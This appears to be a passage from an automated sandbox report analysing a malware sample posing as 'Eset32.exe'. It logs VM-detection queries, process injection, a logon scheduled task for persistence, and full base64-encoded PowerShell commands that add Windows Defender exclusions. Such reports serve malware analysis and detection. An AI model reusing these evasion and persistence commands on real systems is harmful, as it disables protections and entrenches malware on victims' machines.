            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Roaming\12.exe TID: 5320Thread sleep count: 72 > 30Jump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exe TID: 5320Thread sleep time: -72000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780Thread sleep count: 6356 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780Thread sleep count: 2496 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6808Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452Thread sleep count: 4225 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452Thread sleep count: 442 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5632Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 5936Thread sleep count: 75 > 30
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 5936Thread sleep time: -75000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 2804Thread sleep count: 56 > 30
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 2804Thread sleep time: -56000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe TID: 4456Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep count: 6186 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep count: 391 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5204Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776Thread sleep count: 4883 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776Thread sleep count: 960 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6340Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068Thread sleep count: 4198 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5236Thread sleep count: 686 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6968Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6356Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2496Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4225Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 442Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6186
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 391
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4883
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 960
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4198
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 686
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,SHELL32_IconCache_DoneExtractingIcons,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Eset32.exeAPI call chain: ExitProcess graph end nodegraph_0-3273
            Source: AppLaunch.exe, 00000006.00000002.707285264.0000000004E55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware2M_HP1AAWin32_VideoController62BPM7R8VideoController120060621000000.000000-000.8107733display.infMSBDA27EW32_9PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsBZC63ZLH
            Source: AppLaunch.exe, 00000006.00000002.707285264.0000000004E55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
            Source: AppLaunch.exe, 00000006.00000002.707420720.0000000004EC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\AppData\Roaming\12.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\12.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Roaming\1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4A88008Jump to behavior
            .NET source code references suspicious native API functions
            Source: 4.3.1.exe.2610000.0.unpack, u0003u2006.csReference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
            Source: 6.2.AppLaunch.exe.400000.0.unpack, u0003u2006.csReference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
            Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.csReference to suspicious API methods: ('r9AVsVBWr', 'GetProcAddress@kernel32'), ('X0UhT8pIC', 'LoadLibrary@kernel32')
            Encrypted powershell cmdline option found
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -ForceJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -ForceJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
            Allocates memory in foreign processes
            Source: C:\Users\user\AppData\Roaming\1.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Roaming\1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Users\user\AppData\Roaming\12.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exitJump to behavior
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Users\user\AppData\Roaming\12.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exitJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Windows\System.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Windows\System.exe C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess created: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe "C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
